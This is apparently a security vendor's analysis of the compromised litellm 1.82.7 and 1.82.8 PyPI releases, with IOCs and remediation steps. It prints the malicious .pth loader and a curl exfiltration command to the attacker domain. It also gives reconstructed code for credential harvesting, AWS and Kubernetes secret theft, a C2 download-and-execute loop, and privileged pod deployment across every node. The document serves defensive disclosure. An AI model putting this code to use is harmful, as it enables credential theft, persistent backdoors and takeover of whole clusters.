On March 24, 2026, a critical supply chain compromise was identified across two litellm releases on PyPI. The issue was disclosed in BerriAI/litellm#24512.
We independently performed static analysis on both versions, fully decoding the payloads. What we found is a sophisticated, three-stage attack: mass credential harvesting, AES-256+RSA-4096 encrypted exfiltration to an attacker-controlled domain, and a persistent C2 backdoor capable of laterally compromising every node in a Kubernetes cluster. Both versions carry the identical payload and exfiltrate to the same attacker infrastructure — the only difference is the injection mechanism.
If you installed litellm 1.82.7 or 1.82.8: Rotate all secrets immediately — every environment variable, SSH key, cloud credential, and API key present on that system. See the Remediation section below.
Key finding: Two versions are confirmed compromised, each using a different injection technique. litellm==1.82.8 contains a malicious litellm_init.pth file (34,628 bytes) registered in the package’s own RECORD with a valid SHA-256 hash. litellm==1.82.7 embeds the identical credential-stealing payload as a base64 blob directly inside litellm/proxy/proxy_server.py, with no .pth file. Both point to the same attacker RSA public key and the same exfiltration endpoint. This indicates a publishing-credential or CI/CD pipeline compromise spanning at least two releases.
Background: What Is litellm?
LiteLLM is a widely-used Python library that provides a unified API interface for over 100 LLM providers (OpenAI, Anthropic, Bedrock, Vertex AI, etc.). It is a dependency in a large number of AI application stacks, CI/CD pipelines, and production inference services. A developer or engineer installing litellm for routine work would have no reason to suspect the package is exfiltrating credentials.
The issue quickly attracted 196+ comments, the majority of which are generic bot spam — “Thanks, that helped!”, “Worked like a charm”, “This was the answer I was looking for” — the same noise-suppression pattern seen in the second Trivy compromise. This is a deliberate tactic: flooding the issue with off-topic chatter to obscure the severity and make casual readers assume the problem has been handled.
Possible Initial Access Vector: Trivy in CI/CD
A review of the litellm repository points to a possible initial access vector. LiteLLM’s ci_cd/security_scans.sh shows Trivy was used directly in their CI/CD security scan workflow. The threat group TeamPCP had previously compromised Trivy; it is possible they used that foothold to pivot into litellm’s pipeline and inject the malicious payload into the published PyPI releases.

The Entry Points: Two Versions, Two Injection Techniques
1.82.8 — Malicious .pth File
The attack exploits a legitimate but little-known Python feature. Any .pth file placed in a site-packages/ directory is processed by Python’s site module on every interpreter startup. Lines starting with import are executed directly. This means any code in a .pth file runs before any application code and with no user interaction.
The malicious file, litellm_init.pth, is listed in the package’s own RECORD:
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628
Its contents are a single line that spawns a detached subprocess to avoid blocking the Python session:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c",
    "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MK...'))"])
Why this is stealthy: Because .pth execution is a Python interpreter feature — not a setup.py hook or postinstall script — many security scanners and package auditing tools do not flag it. The 34 KB payload is also stored as a single opaque base64 blob, invisible without decoding.
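The .pth behavior described above can be demonstrated safely with a benign file. This is a minimal sketch, not attack code: `site.addsitedir()` processes `.pth` files in a directory the same way interpreter startup processes real site-packages directories, executing any line that begins with `import`.

```python
import os
import site
import tempfile

# Create a scratch directory and drop a harmless .pth file into it.
scratch = tempfile.mkdtemp()
pth_path = os.path.join(scratch, "demo.pth")
with open(pth_path, "w") as f:
    # The site module exec()s lines that start with "import ".
    f.write("import os; os.environ['PTH_RAN'] = '1'\n")

# addsitedir() processes .pth files exactly like interpreter startup does
# for site-packages — the line above runs immediately, with no import of
# any package required.
site.addsitedir(scratch)
print(os.environ.get("PTH_RAN"))  # → 1
```

The malicious package relies on the same behavior, except its single `import` line detaches a subprocess carrying the 34 KB payload.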
1.82.7 — Payload Embedded in proxy_server.py
litellm==1.82.7 does not contain a .pth file. Instead, the identical credential-stealing payload is embedded as a base64 blob directly inside litellm/proxy/proxy_server.py, injected at the module’s top-level import block:
import subprocess, base64, sys, tempfile, os
b64_payload = "aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl..."
The payload decodes to the same credential harvester — same RSA-4096 public key, same AES-256-CBC encryption, same curl POST to https://models.litellm.cloud/. Because it is embedded in the proxy server module rather than a .pth file, it executes when the litellm proxy is imported or started rather than on every Python startup. Users who ran litellm --server or imported the proxy module while on 1.82.7 were affected.
Same attacker, same infrastructure: The RSA public key embedded in both versions is byte-for-byte identical, and both exfiltrate to https://models.litellm.cloud/. The two releases represent a staged campaign — 1.82.7 used a more targeted trigger (proxy startup), while 1.82.8 escalated to a .pth-based approach that fires on every Python interpreter launch regardless of whether the proxy is used.
Stage 1: Mass Credential Harvester
After two base64 decode steps, the first-stage payload is a pure-Python credential collection script. It runs silently in the background until collection completes, then encrypts and exfiltrates everything it finds.
System Reconnaissance
It begins with basic system fingerprinting, writing results to a temp file:
run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')
The run() helper calls subprocess.check_output(cmd, shell=True, stderr=DEVNULL, timeout=10) and silently swallows all errors — ensuring no traceback or visible output reaches the user.
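Based on the behavior described, the run() helper can be reconstructed roughly as follows (a sketch from our static analysis, not a verbatim extract):

```python
import subprocess

def run(cmd: str) -> str:
    """Execute a shell command; swallow stderr, timeouts, and all errors
    so nothing ever surfaces to the victim's terminal."""
    try:
        out = subprocess.check_output(
            cmd,
            shell=True,
            stderr=subprocess.DEVNULL,  # no error output reaches the user
            timeout=10,                 # hung commands are abandoned
        )
        return out.decode(errors="replace")
    except Exception:
        return ""  # any failure (missing binary, nonzero exit) is ignored

print(run("echo recon").strip())  # → recon
```

The blanket `except Exception` is what makes the harvester invisible: a missing `ip` or `ifconfig` binary, a permissions error, or a timeout all degrade silently instead of raising.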
Credential Targets
The harvester then systematically reads every credential file it can reach. The targets span the full range of cloud, developer, and infrastructure secrets:
- SSH Keys: ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; host keys from /etc/ssh/ssh_host_*_key
- Git Credentials: ~/.git-credentials, ~/.gitconfig
- AWS: ~/.aws/credentials, ~/.aws/config; IMDS token + IAM role credentials via 169.254.169.254; live signed API calls to AWS Secrets Manager (ListSecrets + GetSecretValue) and SSM Parameter Store (DescribeParameters)
- Kubernetes: ~/.kube/config, /etc/kubernetes/admin.conf, service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token; live API calls to enumerate secrets across all namespaces
- GCP: ~/.config/gcloud/application_default_credentials.json, $GOOGLE_APPLICATION_CREDENTIALS
- Azure: ~/.azure/ (full recursive walk)
- Docker: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
- Env Files: .env, .env.local, .env.production, /etc/environment; recursive walk to depth 6 across /home, /opt, /app, /data, /var/www
- Package Manager / Tokens: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.pgpass, ~/.mongorc.js, ~/.my.cnf, ~/.msmtprc
- Shell History: ~/.bash_history, ~/.zsh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
- TLS / PKI: /etc/ssl/private/*.key, Let’s Encrypt .pem files; recursive walk for .pem, .key, .p12, .pfx
- CI/CD Configs: terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, ansible.cfg
- Crypto Wallets: Bitcoin, Litecoin, Dogecoin, Ethereum keystore, Solana keypairs (validator-keypair.json, identity.json, etc.), Cardano .skey/.vkey files
- System: /etc/passwd, /etc/shadow, SSH auth logs (/var/log/auth.log, /var/log/secure)
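The file-based portion of this collection reduces to a simple loop: expand each path, read whatever exists, and silently skip the rest. A minimal sketch (the target list shown is an illustrative subset, and the helper name is ours):

```python
import os

# Illustrative subset of the harvester's file targets (not the full list).
TARGETS = [
    "~/.ssh/id_rsa",
    "~/.git-credentials",
    "~/.aws/credentials",
    "~/.kube/config",
    "~/.npmrc",
]

def collect(paths):
    """Read every listed file that exists; unreadable or missing
    files are skipped without any error reaching the user."""
    loot = {}
    for p in paths:
        full = os.path.expanduser(p)
        try:
            with open(full, "rb") as f:
                loot[full] = f.read()
        except OSError:
            continue  # permission denied / not found: move on silently
    return loot

print(len(collect(["/no/such/demo/path"])))  # → 0
```

Combined with a depth-limited `os.walk` over /home, /opt, /app, /data, and /var/www for `.env` files, this pattern accounts for the entire disk-harvesting stage.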
AWS credentials are not just read from disk — the harvester implements a full AWS Signature V4 signing loop in pure Python and makes live API calls to AWS Secrets Manager and SSM Parameter Store with any credentials it finds, exfiltrating the values of all stored secrets:
sm = aws_req('POST', 'secretsmanager', REG, '/', 'Action=ListSecrets',
{'X-Amz-Target': 'secretsmanager.ListSecrets'}, AK, SK, ST)
# then GetSecretValue for each secret in the list
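The pure-Python Signature V4 loop can be reconstructed along these lines. This is a sketch of the standard SigV4 algorithm that the payload implements, with our own function names, not the attacker's exact code:

```python
import datetime
import hashlib
import hmac

def _sign(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()

def sigv4_auth_header(access_key, secret_key, region, service,
                      method, host, path, body, amz_target, now=None):
    """Build an AWS Signature V4 Authorization header (minimal sketch:
    empty query string, three signed headers)."""
    now = now or datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    date = now.strftime("%Y%m%d")
    payload_hash = hashlib.sha256(body.encode()).hexdigest()

    # Canonical request: method, path, (empty) query, headers, payload hash.
    headers = f"host:{host}\nx-amz-date:{amz_date}\nx-amz-target:{amz_target}\n"
    signed = "host;x-amz-date;x-amz-target"
    canonical = f"{method}\n{path}\n\n{headers}\n{signed}\n{payload_hash}"

    # String to sign, scoped to date/region/service.
    scope = f"{date}/{region}/{service}/aws4_request"
    to_sign = (f"AWS4-HMAC-SHA256\n{amz_date}\n{scope}\n"
               + hashlib.sha256(canonical.encode()).hexdigest())

    # Derive the signing key through the chained HMAC steps.
    k = _sign(_sign(_sign(_sign(("AWS4" + secret_key).encode(), date),
                          region), service), "aws4_request")
    sig = hmac.new(k, to_sign.encode(), hashlib.sha256).hexdigest()
    return (f"AWS4-HMAC-SHA256 Credential={access_key}/{scope}, "
            f"SignedHeaders={signed}, Signature={sig}")
```

With a header like this, plus temporary credentials pulled from IMDS, the harvester needs nothing beyond the Python standard library and an HTTP client to call Secrets Manager and SSM directly.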
Similarly, if a Kubernetes service account token is present, it makes live API calls to enumerate and read secrets across all namespaces:
secrets = k8s_get('/api/v1/secrets')
for ns_item in ns_data.get('items', []):
ns = ns_item['metadata']['name']
ns_secrets = k8s_get(f'/api/v1/namespaces/{ns}/secrets')
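The k8s_get helper behind these calls can be reconstructed as follows, assuming the standard in-cluster access pattern (mounted service account token, default API server address); the split into a request-builder and a fetcher is our own structuring:

```python
import json
import ssl
import urllib.request

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
API = "https://kubernetes.default.svc"

def build_k8s_request(path, token, api=API):
    """Build an authenticated GET against the in-cluster API server."""
    return urllib.request.Request(
        api + path,
        headers={"Authorization": f"Bearer {token}"},
    )

def k8s_get(path):
    """GET a Kubernetes API path using the mounted service account token."""
    with open(TOKEN_PATH) as f:
        token = f.read().strip()
    # The harvester skips certificate validation entirely.
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(build_k8s_request(path, token),
                                context=ctx, timeout=10) as resp:
        return json.load(resp)
```

Any pod whose service account can list secrets cluster-wide hands the attacker every Secret object in every namespace with two round trips.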
Encryption and Exfiltration
All collected data is written to a temp file, then encrypted before transmission — making the exfiltrated archive unreadable without the attacker’s private key:
- A random 32-byte AES session key is generated:
  openssl rand -out session.key 32
- The collected data is encrypted:
  openssl enc -aes-256-cbc -in collected -out payload.enc -pass file:session.key -pbkdf2
- The session key is RSA-encrypted with a hardcoded 4096-bit public key:
  openssl pkeyutl -encrypt -pubin -inkey pub.pem -pkeyopt rsa_padding_mode:oaep
- Both files are packed as tpcp.tar.gz and POSTed to the C2:
  curl -s -X POST "https://models.litellm.cloud/" \
    -H "Content-Type: application/octet-stream" \
    -H "X-Filename: tpcp.tar.gz" \
    --data-binary @tpcp.tar.gz
The exfiltration endpoint is models.litellm.cloud — a domain that deliberately mimics the legitimate litellm.ai. The RSA public key embedded in the payload begins:
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV
...
The use of hybrid encryption (AES session key + RSA-4096 envelope) means only the attacker, in possession of the corresponding private key, can decrypt what was stolen.
Stage 2: Persistent C2 Backdoor
In parallel, the stage-1 script drops a persistence implant — sysmon.py — to ~/.config/sysmon/sysmon.py and registers it as a systemd user service:
[Unit]
Description=System Telemetry Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/python3 /home/user/.config/sysmon/sysmon.py
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
No root is required. The service persists across reboots, restarts on failure, and produces no visible output. The name “System Telemetry Service” is chosen to look innocuous in a systemctl list-units listing.
The implant polls a C2 controller at https://checkmarx.zone/raw — a domain that impersonates the legitimate Checkmarx security brand. The polling loop:
C_URL = "https://checkmarx.zone/raw"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"
# Polls every ~50 minutes
# Fetches a URL from C_URL
# Downloads binary to /tmp/pglog, chmod 0o755, executes detached
# Tracks last-downloaded URL in /tmp/.pg_state to avoid re-runs
The C2 endpoint serves an arbitrary URL. The implant downloads whatever binary is at that URL, makes it executable, and runs it as a detached process. This provides the attacker with a persistent, updateable remote code execution channel on every affected machine.
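Putting the commented pseudocode together, a single polling iteration behaves roughly like this. This is a behavioral reconstruction from static analysis (the `fetch` parameter is our addition for clarity; the constants are from the implant); do not contact the listed domain:

```python
import os
import subprocess
import urllib.request

C_URL = "https://checkmarx.zone/raw"   # C2 index -- do NOT contact
TARGET = "/tmp/pglog"                  # downloaded stage-2 binary
STATE = "/tmp/.pg_state"               # last URL executed

def poll_once(fetch=urllib.request.urlopen):
    """One loop iteration: ask the C2 for a URL, download and run the
    binary there if it hasn't been run before."""
    url = fetch(C_URL, timeout=30).read().decode().strip()
    last = open(STATE).read().strip() if os.path.exists(STATE) else ""
    if url == last:
        return False  # this stage-2 payload already executed
    with open(TARGET, "wb") as f:
        f.write(fetch(url, timeout=60).read())
    os.chmod(TARGET, 0o755)
    # Detached execution: survives the parent, produces no output.
    subprocess.Popen([TARGET], start_new_session=True)
    with open(STATE, "w") as f:
        f.write(url)  # record the URL so it is not re-run
    return True
```

Wrapped in a `while True` with a ~50-minute sleep and blanket exception handling, this gives the attacker an updateable remote code execution channel that costs one HTTPS request per hour.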
Stage 3: Kubernetes Lateral Movement
If stage 1 finds a Kubernetes service account token, it does not just read secrets — it deploys a privileged pod to every node in the cluster. The pod manifest:
{
  "kind": "Pod",
  "metadata": {"name": "node-setup-<node-name>", "namespace": "kube-system"},
  "spec": {
    "nodeName": "<node>",
    "hostPID": true,
    "hostNetwork": true,
    "tolerations": [{"operator": "Exists"}],  // schedules on ALL nodes, including tainted
    "containers": [{
      "image": "alpine:latest",
      "securityContext": {"privileged": true},
      "volumeMounts": [{"name": "host", "mountPath": "/host"}]
    }],
    "volumes": [{"name": "host", "hostPath": {"path": "/"}}]  // mounts the host filesystem
  }
}
The container runs as privileged with hostPID, hostNetwork, and the host root filesystem mounted at /host. Its command writes sysmon.py to /host/root/.config/sysmon/sysmon.py on the node, then registers and starts it as a systemd service via chroot /host systemctl. This effectively installs the C2 backdoor on the host node OS, not just in the container.
With tolerations: [{operator: Exists}], the pod will be scheduled on every node in the cluster, including those with NoSchedule or NoExecute taints. A single compromised workload in a cluster can silently backdoor every node.
Impact in K8s environments: Even if the infected Python process runs in a short-lived container, the moment it finds a service account token with pod-create permissions in kube-system, the attack escapes the container and persists on the bare-metal or VM nodes beneath it. Cleaning up the container is insufficient.
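The deployment logic itself is a short loop over the node list. A sketch with hypothetical helper names (`k8s_get`/`k8s_post` stand in for the payload's API wrappers), using the manifest fields identified above:

```python
def node_setup_manifest(node_name):
    """Privileged pod pinned to one node, tolerating all taints,
    with the host root filesystem mounted at /host."""
    return {
        "kind": "Pod",
        "metadata": {"name": f"node-setup-{node_name}",
                     "namespace": "kube-system"},
        "spec": {
            "nodeName": node_name,
            "hostPID": True,
            "hostNetwork": True,
            "tolerations": [{"operator": "Exists"}],
            "containers": [{
                "name": "setup",
                "image": "alpine:latest",
                "securityContext": {"privileged": True},
                "volumeMounts": [{"name": "host", "mountPath": "/host"}],
            }],
            "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
        },
    }

def deploy_to_all_nodes(k8s_get, k8s_post):
    """Enumerate every node and create one privileged pod per node."""
    for node in k8s_get("/api/v1/nodes").get("items", []):
        name = node["metadata"]["name"]
        k8s_post("/api/v1/namespaces/kube-system/pods",
                 node_setup_manifest(name))
```

One GET on /api/v1/nodes and one POST per node is all it takes: cluster-wide node compromise scales linearly with cluster size and completes in seconds.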
Controlled Execution Analysis
To validate our static analysis findings, StepSecurity ran the malicious package in a controlled GitHub Actions environment with Harden Runner enabled in audit mode. The execution confirmed every stage of the attack chain — and revealed why the malware behaves unusually on standard GitHub-hosted runners.
What Harden Runner Captured
Within seconds of import litellm, Harden Runner recorded two notable outbound events in the "Verify LiteLLM import and version" step:
169.254.169.254:80 — the cloud instance metadata service (IMDS). Harden Runner flagged this as anomalous. This is the malware's AWS credential live-harvest path: it queries IMDS to obtain an instance role's temporary credentials, then uses those credentials — signed with AWS Signature V4 — to call ListSecrets on Secrets Manager and enumerate SSM Parameter Store values across every AWS region. The request was initiated by a curl child process spawned by the Python payload.
models.litellm.cloud:443 — the exfiltration endpoint identified in our static analysis. The harvester encrypted collected credentials with AES-256+RSA-4096 and attempted to POST them as tpcp.tar.gz to this domain. This was the first network event after the package was imported, confirming the payload fires immediately on Python startup.

Why the Malware Gets Stuck on GitHub Runners
On standard GitHub-hosted runners (2-core, 7 GB RAM) the malware causes severe CPU exhaustion and the job eventually times out. This is not a coincidence — it is the direct result of how the payload is architected:
The .pth mechanism fires on every Python process, including subprocesses it spawns itself. Python's site module executes litellm_init.pth on every interpreter startup. When the credential harvester spawns a detached subprocess (which also uses Python), that subprocess triggers litellm_init.pth again. This creates a recursive fork where each generation of the payload spawns the next. In a single GitHub Actions step that invokes pip, python -c, or any other Python command multiple times, the process tree grows rapidly.

AWS IMDS timeout loops. The harvester iterates through AWS regions attempting to reach the metadata service at 169.254.169.254. In ARC (Actions Runner Controller) environments and self-hosted runners that do not have IMDS configured, each connection attempt blocks for the full TCP timeout before moving on. Multiplied across regions and services (Secrets Manager, SSM, EC2 metadata), the payload can block for several minutes on network I/O alone.
Recursive filesystem traversal. The harvester walks /home, /opt, /app, /data, and /var/www to a depth of 6, collecting every .env file it finds. On a GitHub Actions runner with a large Python environment installed (litellm brings hundreds of transitive dependencies), this traversal touches a significant number of inodes and dominates CPU time.
RSA-4096 encryption under load. After collection, all harvested data is encrypted with AES-256-CBC and the session key is wrapped with a 4096-bit RSA public key. On a shared 2-core runner already under load from the process tree explosion, this operation can spike CPU to 100% for extended periods.
The net result: on a small GitHub-hosted runner, the job appears to hang. The step running import litellm never exits cleanly. On a larger machine — as observed in our partial execution run — the payload progresses further through the harvest and exfiltration stages before the runner resource limits are hit.

Downstream Impact
LiteLLM is a transitive dependency in a large number of AI frameworks and tools. Because most projects pin litellm>=<some-version> with no upper bound, users of these projects may have pulled 1.82.7 or 1.82.8 without ever directly depending on litellm. The following high-profile projects opened issues on March 24, 2026 confirming exposure or broken CI due to the quarantine.
Microsoft GraphRAG (microsoft/graphrag#2289) — GraphRAG depends on litellm and flagged the supply chain compromise affecting its users.
Google ADK Python (google/adk-python#4981) — google-adk[eval] is broken because litellm has been quarantined on PyPI. No workaround exists short of removing the eval extra entirely.
DSPy (stanfordnlp/dspy#9499) — DSPy depends on litellm, which is quarantined on PyPI. All fresh installs are currently blocked.
OpenHands (OpenHands/OpenHands#13567) — All OpenHands CI jobs are failing because litellm is quarantined. The issue confirms that versions 1.82.7 and 1.82.8 steal SSH keys, environment variables, and API keys.
browser-use (browser-use/browser-use#4505) — The browser-use CLI installs litellm>=1.82.2 which pulled the malicious 1.82.8. The issue describes the full three-stage payload including the persistent backdoor polling checkmarx.zone.
crawl4ai (unclecode/crawl4ai#1864) — The published PyPI release of crawl4ai (v0.8.5) specifies litellm>=1.53.1 with no upper bound. A fix exists on the develop branch but has not been released.
ii-agent (Intelligent-Internet/ii-agent#186) — ii-agent’s pyproject.toml pins litellm>=1.63.14 with no upper bound, potentially pulling compromised versions. Recommends pinning <1.82.7.
BeeAI Framework (i-am-bee/beeai-framework#1413) — BeeAI Framework does not enforce a vetted litellm version; users installing it were exposed to the compromise.
If you use any of the above frameworks: Check whether your installed environment pulled litellm 1.82.7 or 1.82.8 as a transitive dependency. Run pip show litellm to confirm the installed version and treat any system where these versions were present as fully compromised.
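For environments with many Python installs, the check can be scripted instead of run by hand. A small sketch using the standard library (the helper name is ours):

```python
from importlib.metadata import PackageNotFoundError, version

# The two releases confirmed compromised in this incident.
COMPROMISED = {"1.82.7", "1.82.8"}

def is_compromised(v: str) -> bool:
    """True if the given litellm version string is a known-bad release."""
    return v in COMPROMISED

try:
    installed = version("litellm")
except PackageNotFoundError:
    print("litellm is not installed in this environment")
else:
    verdict = ("COMPROMISED - treat this system as breached"
               if is_compromised(installed)
               else "not a known-bad version")
    print(f"litellm {installed}: {verdict}")
```

Note this only inspects the environment the script runs in; repeat it in every virtualenv, container image, and CI cache that may have resolved litellm transitively.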
The Comment Spam Campaign
The GitHub issue received 196+ comments within hours, the vast majority of which are off-topic generic responses from accounts with no prior contribution history:
“Thanks, that helped!” · “Worked like a charm, much appreciated.” · “This was the answer I was looking for.” · “Great explanation, thanks for sharing.” · “Exactly what I needed, thanks.”
This is the same noise-injection tactic observed in the Trivy second compromise. By flooding the issue with low-signal comments, attackers make it harder for maintainers and users scanning the issue to assess actual severity, and create a false impression that affected users have found workarounds and moved on.
Attack Flow Summary
T+0 — pip install litellm==1.82.8: litellm_init.pth is written to site-packages/. No code runs yet.
T + next Python startup — Python’s site module executes the .pth file and a detached subprocess spawns. The victim’s Python process continues normally: no errors, no visible output.
T + seconds to minutes — Stage-1 credential harvester runs: collects SSH keys, cloud credentials, env vars, K8s secrets, shell history, crypto wallets. Encrypts with AES-256/RSA-4096. POSTs tpcp.tar.gz to https://models.litellm.cloud/.
T + seconds (concurrent) — If a Kubernetes service account token is found: deploys privileged pods to all cluster nodes, installing the backdoor on each host OS.
T + persistent — sysmon.py dropped to ~/.config/sysmon/, systemd user service installed. Polls https://checkmarx.zone/raw every ~50 minutes for arbitrary second-stage binaries.
Remediation
Immediate actions if litellm 1.82.7 or 1.82.8 was installed on any system:
- Check for the malicious .pth file:
  find /usr/lib/python3 ~/.local/lib /opt -name "litellm_init.pth" 2>/dev/null
  Any result confirms the compromised package was installed.
- Check for the persistence backdoor:
  ls ~/.config/sysmon/sysmon.py
  ls ~/.config/systemd/user/sysmon.service
  systemctl --user status sysmon.service
  If these exist, the malware ran and the backdoor is active. Stop and disable the service before remediation.
- Check for K8s lateral movement (if on a Kubernetes cluster):
  kubectl get pods -n kube-system | grep node-setup
  Delete any matching pods immediately. Check all nodes for ~root/.config/sysmon/sysmon.py.
- Rotate all credentials that were accessible on the affected system:
  - AWS access keys and session tokens, including all IAM roles attached to the instance
  - Kubernetes service account tokens and kubeconfig certificates
  - SSH private keys; also remove the corresponding public keys from authorized_keys on remote systems
  - GCP service account keys, Azure credentials
  - All .env file values: API keys, database URLs, webhook tokens
  - Docker Hub / container registry tokens
  - npm, PyPI, and other package registry tokens
- Rotate AWS Secrets Manager and SSM secrets regardless of whether you see evidence of exfiltration — the harvester calls the APIs live and retrieves values directly.
- Audit network logs for outbound connections to models.litellm.cloud and checkmarx.zone. These connections confirm exfiltration and/or C2 activity.
- Upgrade litellm to a version confirmed clean, and verify that litellm_init.pth is absent before re-installing.
- CI/CD pipelines: If litellm 1.82.7 or 1.82.8 was installed in any CI/CD workflow, assume every secret in that workflow’s environment was exfiltrated — NPM_TOKEN, PYPI_TOKEN, AWS_SECRET_ACCESS_KEY, GitHub PATs, everything. Rotate all secrets injected into those pipelines.
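The host-level checks above can be combined into a single triage script. This is a hypothetical helper we wrote for convenience, covering only the file-based IOCs from this incident, not an exhaustive detector:

```python
import glob
import os

# Persistence artifacts dropped by the stage-2 implant.
PERSISTENCE_IOCS = [
    "~/.config/sysmon/sysmon.py",
    "~/.config/systemd/user/sysmon.service",
]

def find_iocs(extra_roots=("/usr/lib", "/opt")):
    """Return a list of known file-based IOCs present on this host."""
    hits = []
    # The malicious .pth from litellm 1.82.8, wherever site-packages lives.
    for root in extra_roots:
        hits += glob.glob(os.path.join(root, "**", "litellm_init.pth"),
                          recursive=True)
    hits += glob.glob(os.path.expanduser("~/.local/lib/**/litellm_init.pth"),
                      recursive=True)
    # The sysmon persistence files.
    for p in PERSISTENCE_IOCS:
        full = os.path.expanduser(p)
        if os.path.exists(full):
            hits.append(full)
    return hits

print(find_iocs() or "no known file-based IOCs found")
```

A clean result here does not clear the system: credentials may already have been exfiltrated before cleanup, so the rotation steps above still apply.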
How StepSecurity Helps
Harden-Runner monitors every outbound network connection made during a GitHub Actions workflow. Organizations running Harden-Runner with allowed-endpoint policies would have had the connection to models.litellm.cloud blocked before exfiltration occurred, and received an alert flagging the anomalous outbound request.
StepSecurity Enterprise customers can visit the Threat Center for the full alert on this incident, including the complete IOC set, affected version details, and remediation steps.
Threat Center delivers real-time alerts about compromised packages, hijacked maintainers, and emerging attack campaigns directly into existing SIEM workflows. Alerts include attack summaries, technical analysis, IOCs, affected versions, and remediation steps.

References
GitHub Issue #24512: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 (BerriAI/litellm)
Python docs: site module — .pth file processing
StepSecurity Blog: Trivy Compromised a Second Time — Malicious v0.69.4 Release


